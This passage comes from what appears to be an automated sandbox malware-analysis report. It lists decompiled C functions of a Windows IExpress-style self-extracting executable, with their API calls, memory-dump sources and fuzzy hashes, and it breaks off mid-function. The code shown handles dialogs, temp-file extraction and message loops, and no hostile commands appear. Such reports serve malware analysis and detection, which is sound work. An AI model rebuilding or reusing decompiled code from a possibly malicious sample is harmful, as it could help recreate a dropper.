                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 000E1A18
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E1A24
                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 000E1A4F
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 000E1A62
                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 000E1A6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                      • Opcode ID: 2dedcc1972a9eee9885fa11f69e36124a659305ec33aac961f4cb54371facb13
                                                                                                                                                                                                      • Instruction ID: 7f3d700313551aa301751781b272b200a870a399e43d6cc50013a6a0af26fbdc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dedcc1972a9eee9885fa11f69e36124a659305ec33aac961f4cb54371facb13
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC1108316001899FEB10EF64DD48AFE77B8EF09710F1481A5F912F7191CA34AE00CB92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                      			E000E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                      				E000E1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      				E000E658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                      						 *0xe9124 = 0x80070052;
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *0xe9124 = 0x80070052;
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E642D
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E645B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E647A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 000E63EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      • API String ID: 1065093856-183442868
                                                                                                                                                                                                      • Opcode ID: 5c4854c5703b1050e848ec0a262e07ea5cc26589be1d33227d4f00edd28b10c9
                                                                                                                                                                                                      • Instruction ID: 476e6c3fa579783dec7afc7bbb19a88a18aa4008ac76a173b52f7a171fb9e336
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c4854c5703b1050e848ec0a262e07ea5cc26589be1d33227d4f00edd28b10c9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 712105B1A00258AFD710DF26ECC5FEB73B8EB59350F0041A9F584B7280CAB56D848F60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                      						E000E1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                      						_t11 =  *0xe91e0; // 0x2d77c60
                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                      						 *0xe91e0 = _t34;
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t25 =  *0xe8584; // 0x0
                                                                                                                                                                                                      					E000E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 =  *0xe8584; // 0x0
                                                                                                                                                                                                      				E000E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,000E4E6F), ref: 000E47EA
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 000E4823
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 000E4847
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 000E4851
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      • API String ID: 359063898-183442868
                                                                                                                                                                                                      • Opcode ID: 6b7ccadc434f02a26d2ff31d3892c7c5ad214a2880eaca3e3d945b61df2191cd
                                                                                                                                                                                                      • Instruction ID: e0993e2b4f9fea4b7dd782d30212eb6309aa6ad954762d3305fc481e3640b7d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b7ccadc434f02a26d2ff31d3892c7c5ad214a2880eaca3e3d945b61df2191cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C91136B57006C16FE7288F259C58FBA3B9AEBC5700F048459E982BB341CE399C068720
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E000E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t23 =  *0xe9a3c; // 0xe0000
                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E000E44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t24 = _a16;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(000E0000,000007D6,00000005), ref: 000E652A
                                                                                                                                                                                                      • LoadResource.KERNEL32(000E0000,00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000E6538
                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(000E0000,00000000,00000547,000E19E0,00000000), ref: 000E6557
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000E6560
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1214682469-0
                                                                                                                                                                                                      • Opcode ID: f38376d1e7660cee9e1a8eb6c7bbc796d9d63be2f119ee65ae2d81e559ec293c
                                                                                                                                                                                                      • Instruction ID: 956fe8465cd6d57888c428207691170c35b461469c2d09d9e7c7f55b34a0c9ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f38376d1e7660cee9e1a8eb6c7bbc796d9d63be2f119ee65ae2d81e559ec293c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1012B73300585BFDB205F5AAC48DBB76ACEB997A1F010125FE11B7150D776DD1086B1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E3680(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000E369F
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000E36B2
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 000E36CB
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000E36DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                      • Opcode ID: fe4caffa511867f7d60e24b62cf8a182a6a8154a29b5d5d4a64698980f5def55
                                                                                                                                                                                                      • Instruction ID: 339daf4c64505870c785528815b031292ff1bdd7b3833ab7a787ab36be55c125
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe4caffa511867f7d60e24b62cf8a182a6a8154a29b5d5d4a64698980f5def55
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3018476A002947FDB304AA75C4CEEBBFBCEBCAF10F004159B905F7180D5659640C660
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                      			E000E65E8(char* __ecx) {
                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t16 = _t10;
                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}










                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,000E2B33), ref: 000E6602
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 000E6612
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 000E6629
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 000E6635
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                      • Opcode ID: 1a455d652a5ad36e4ebad611e173031636dd354b34287b67c19a03b4eefac794
                                                                                                                                                                                                      • Instruction ID: 5a755f099a5a671e0b5654145f5537371440f2047ca56dde0a629dc3041c1a7c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a455d652a5ad36e4ebad611e173031636dd354b34287b67c19a03b4eefac794
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F07D321000C06EE7320B2A6CC88BBBFDCCFAB394B1901AFE891B2000D61B0C028661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E69B0() {
                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				 *0xe81f8 = E000E6C70();
                                                                                                                                                                                                      				__set_app_type(E000E6FBE(2));
                                                                                                                                                                                                      				 *0xe88a4 =  *0xe88a4 | 0xffffffff;
                                                                                                                                                                                                      				 *0xe88a8 =  *0xe88a8 | 0xffffffff;
                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                      				_t11 =  *0xe8528; // 0x0
                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                      				_t12 =  *0xe851c; // 0x0
                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                      				_t6 = E000E7000();
                                                                                                                                                                                                      				if( *0xe8000 == 0) {
                                                                                                                                                                                                      					__setusermatherr(E000E7000);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E000E71EF(_t6);
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 000E6FC5
                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 000E69C2
                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 000E69D8
                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 000E69E6
                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 000E6A07
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                      • Opcode ID: 511489954baff41ebe002faef63f5065096f978479c8f7c7810aed2055e6a257
                                                                                                                                                                                                      • Instruction ID: c6db3857f666ce3c6bdb80116f86d17acd2676051fab9e45cd2136b7686506e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 511489954baff41ebe002faef63f5065096f978479c8f7c7810aed2055e6a257
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0FE706083C1CFE7586B35FE8A6043B61FB09B21B104659E569BE2F1CF3E95408F11
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Callgraph


                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00A63BA2() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				short _v300;
                                                                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                                                                      				void _v348;
                                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                                      				intOrPtr _v356;
                                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                                      				short _v364;
                                                                                                                                                                                                      				char* _v368;
                                                                                                                                                                                                      				intOrPtr _v372;
                                                                                                                                                                                                      				void* _v376;
                                                                                                                                                                                                      				intOrPtr _v380;
                                                                                                                                                                                                      				char _v384;
                                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                                      				intOrPtr _v392;
                                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                                      				void* _v408;
                                                                                                                                                                                                      				void* _v424;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      				void* _t77;
                                                                                                                                                                                                      				signed int _t79;
                                                                                                                                                                                                      				short _t96;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				signed int _t104;
                                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                                      				int _t112;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				signed char _t118;
                                                                                                                                                                                                      				void* _t125;
                                                                                                                                                                                                      				signed int _t127;
                                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                                      				struct HINSTANCE__* _t129;
                                                                                                                                                                                                      				void* _t130;
                                                                                                                                                                                                      				short _t137;
                                                                                                                                                                                                      				char* _t140;
                                                                                                                                                                                                      				signed char _t144;
                                                                                                                                                                                                      				signed char _t145;
                                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                                      				void* _t150;
                                                                                                                                                                                                      				void* _t151;
                                                                                                                                                                                                      				signed int _t153;
